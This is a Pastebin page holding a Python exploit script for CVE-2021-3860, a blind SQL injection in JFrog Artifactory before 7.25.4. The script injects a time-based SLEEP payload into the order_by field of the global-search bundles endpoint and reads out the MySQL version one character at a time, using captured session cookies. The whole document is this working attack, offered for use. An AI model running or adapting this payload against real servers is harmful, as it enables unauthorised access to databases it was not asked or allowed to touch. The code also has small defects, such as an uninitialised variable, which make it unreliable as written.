Advertisement
FlyFar

JFrog Artifactory < 7.25.4 - Blind SQL Injection - CVE-2021-3860

Feb 22nd, 2024
1,175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.12 KB | Cybersecurity | 0 0
  1. # Exploit Title: artifactory low-privileged blind sql injection
  2. # Google Dork:
  3. # Date:
  4. # Exploit Author: ardr
  5. # Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
  6. # Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
  7. # Version: JFrog Artifactory prior to 7.25.4
  8. # Tested on: MySQL
  9. # CVE : CVE-2021-3860
  10.  
  11. import requests, string, time
  12. from sys import stdout,exit
  13. import warnings
  14. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  15.  
  16. # written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
  17. # old script for CVE-2021-3860
  18. # log into artifactory with any user.  there must be populated data in the system.  a fresh install will not work.
  19. # you will need to be able to capture a valid request to the below endpoint in order to run this script.
  20. # once captured, replace the cookies and headers below
  21.  
  22.  
  23. warnings.simplefilter('ignore',InsecureRequestWarning)
  24.  
  25.  
  26. session = requests.session()
  27. base = input("Please enter the base url: ")
  28. url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
  29. # headers = Replace this with captured headers from the above endpoint
  30. pos = 1
  31. # cookies = Replace this with captured cookies from the above endpoint
  32.  
  33.  
  34. while True:
  35.     for i in string.digits + '.':
  36.         data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
  37.         start = time.time()
  38.         r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
  39.         request_time = time.time() - start
  40.         if request_time > 5:
  41.             version += i
  42.             pos += 1
  43.             stdout.write(i)
  44.             stdout.flush()
  45.             break
  46.         if len(version) >= 6:
  47.             stdout.write("\n")
  48.             print(f"Version found: MySQL {version}")
  49.             exit(0)
  50.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement